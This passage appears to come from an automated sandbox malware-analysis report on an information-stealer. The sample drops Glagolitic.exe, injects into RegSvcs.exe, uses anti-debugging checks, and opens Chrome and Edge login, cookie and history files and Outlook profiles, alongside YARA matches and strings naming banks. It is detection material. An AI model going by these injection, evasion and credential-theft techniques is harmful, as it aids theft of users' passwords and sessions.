              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: RegSvcs.exe, 00000003.00000002.3308161970.0000000001596000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: mKRflLn5sx.exe, 00000000.00000002.859463226.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3308619299.0000000000E89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; API call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; API call chain: ExitProcess graph end node
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 6_2_06529548 LdrInitializeThunk,6_2_06529548
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0045A370 BlockInput,0_2_0045A370
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_03F19120 mov eax, dword ptr fs:[00000030h] 0_2_03F19120
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_03F190C0 mov eax, dword ptr fs:[00000030h] 0_2_03F190C0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_03F17AB0 mov eax, dword ptr fs:[00000030h] 0_2_03F17AB0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_03F63680 mov eax, dword ptr fs:[00000030h] 2_2_03F63680
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_03F64CF0 mov eax, dword ptr fs:[00000030h] 2_2_03F64CF0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_03F64C90 mov eax, dword ptr fs:[00000030h] 2_2_03F64C90
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_03EDD680 mov eax, dword ptr fs:[00000030h] 5_2_03EDD680
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_03EDECF0 mov eax, dword ptr fs:[00000030h] 5_2_03EDECF0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_03EDEC90 mov eax, dword ptr fs:[00000030h] 5_2_03EDEC90
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_0041F250 SetUnhandledExceptionFilter,5_2_0041F250
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041A208
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Code function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417DAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1159008
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 937008
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
              Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: Glagolitic.exe; Binary or memory string: Shell_TrayWnd
              Source: mKRflLn5sx.exe, 00000000.00000002.859146828.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Glagolitic.exe, 00000002.00000002.875780279.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Glagolitic.exe, 00000005.00000002.987621063.0000000000401000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match; File source: 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 4400, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
